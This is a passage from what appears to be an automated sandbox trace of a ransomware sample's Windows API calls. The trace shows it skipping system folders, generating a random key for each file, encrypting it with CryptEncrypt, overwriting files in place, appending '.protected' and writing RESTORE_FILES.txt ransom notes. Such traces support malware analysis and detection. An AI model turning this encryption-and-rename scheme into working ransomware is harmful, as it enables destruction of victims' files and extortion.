(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\cuju.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cuju.odt.protected")) returned 1 [0089.732] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.732] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="Windows") returned -1 [0089.732] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="Program Files") returned -1 [0089.735] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="Program Files (x86)") returned -1 [0089.735] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="$Recycle.bin") returned 1 [0089.735] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="System Volume Information") returned -1 [0089.735] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrIW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".protected") returned 0x0 [0089.735] lstrcmpW (lpString1="dp-nCk0VRWoB.swf", lpString2="RESTORE_FILES.txt") returned -1 [0089.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dp-nck0vrwob.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrW 
(lpFirst="dp-nCk0VRWoB.swf", lpSrch=".txt") returned 0x0 [0089.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".rar") returned 0x0 [0089.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".zip") returned 0x0 [0089.737] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.738] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.738] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.739] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.739] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.739] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.739] CloseHandle (hObject=0xd4) returned 1 [0089.740] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf.protected") returned 76 [0089.740] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dp-nck0vrwob.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dp-nck0vrwob.swf.protected")) returned 1 [0089.743] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="Windows") returned -1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="Program Files") returned -1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="Program Files (x86)") returned -1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="$Recycle.bin") returned 1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="System Volume Information") returned -1 [0089.743] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.743] StrStrIW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".protected") returned 0x0 [0089.743] lstrcmpW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="RESTORE_FILES.txt") returned -1 [0089.743] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.743] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eclnszyyrcaqyubab.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.744] StrStrW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".txt") returned 0x0 [0089.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.744] StrStrW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".rar") returned 0x0 [0089.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.744] StrStrW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".zip") returned 0x0 [0089.744] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.747] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.747] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.748] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.748] CloseHandle (hObject=0xd4) returned 1 [0089.749] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav.protected") returned 81 [0089.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eclnszyyrcaqyubab.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eclnszyyrcaqyubab.wav.protected")) returned 1 [0089.750] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="Windows") returned -1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="Program Files") returned -1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="Program Files (x86)") returned -1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="$Recycle.bin") returned 1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="System Volume Information") returned -1 [0089.750] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.750] StrStrIW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".protected") returned 0x0 [0089.750] lstrcmpW (lpString1="etwJJ2ULJq.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0089.750] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.750] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\etwjj2uljq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.751] StrStrW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".txt") returned 0x0 [0089.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.751] StrStrW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".rar") returned 0x0 [0089.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.751] StrStrW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".zip") returned 0x0 [0089.751] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.752] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.752] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.752] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.753] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.753] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, 
lpOverlapped=0x0) returned 1 [0089.753] CloseHandle (hObject=0xd4) returned 1 [0089.753] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a.protected") returned 74 [0089.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\etwjj2uljq.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\etwjj2uljq.m4a.protected")) returned 1 [0089.754] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.754] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="Windows") returned -1 [0089.754] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="Program Files") returned -1 [0089.754] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="Program Files (x86)") returned -1 [0089.755] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="$Recycle.bin") returned 1 [0089.755] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="System Volume Information") returned -1 [0089.755] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.755] StrStrIW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".protected") returned 0x0 [0089.755] lstrcmpW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="RESTORE_FILES.txt") returned -1 [0089.755] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.755] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.757] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iczqbiwgvnp4vq8_u7f.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.757] StrStrW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".txt") returned 0x0 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.757] StrStrW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".rar") returned 0x0 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp") returned 73 [0089.757] StrStrW (lpFirst="iczqBiWGVNp4VQ8_u7f.odp", lpSrch=".zip") returned 0x0 [0089.757] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x256d, lpOverlapped=0x0) returned 1 [0089.758] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffda93, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.758] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x256d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x256d, lpOverlapped=0x0) returned 1 [0089.759] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.759] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 
[0089.759] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.759] CloseHandle (hObject=0xd4) returned 1 [0089.760] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp.protected") returned 83 [0089.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iczqbiwgvnp4vq8_u7f.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\iczqBiWGVNp4VQ8_u7f.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iczqbiwgvnp4vq8_u7f.odp.protected")) returned 1 [0089.768] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="Windows") returned -1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="Program Files") returned -1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="Program Files (x86)") returned -1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="$Recycle.bin") returned 1 [0089.768] lstrcmpiW (lpString1="Identities", lpString2="System Volume Information") returned -1 [0089.768] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities") returned 60 [0089.768] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0089.768] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0089.768] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*") returned 62 [0089.768] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.769] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.769] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.769] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.769] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.769] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\.") returned 62 [0089.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.769] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.769] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.769] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.769] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.769] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.769] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\..") returned 63 [0089.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.769] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Windows") returned -1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files") returned -1 [0089.769] lstrcmpiW 
(lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="Program Files (x86)") returned -1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="$Recycle.bin") returned 1 [0089.769] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="System Volume Information") returned -1 [0089.769] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 99 [0089.769] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0089.769] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0089.770] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned 101 [0089.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.770] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.770] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.770] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.770] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.770] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.770] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\.") returned 101 [0089.770] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.770] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.770] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.770] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.770] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.770] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.770] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.770] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\..") returned 102 [0089.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.771] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.771] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.771] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt") returned 117 [0089.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.772] lstrlenA (lpString="! 
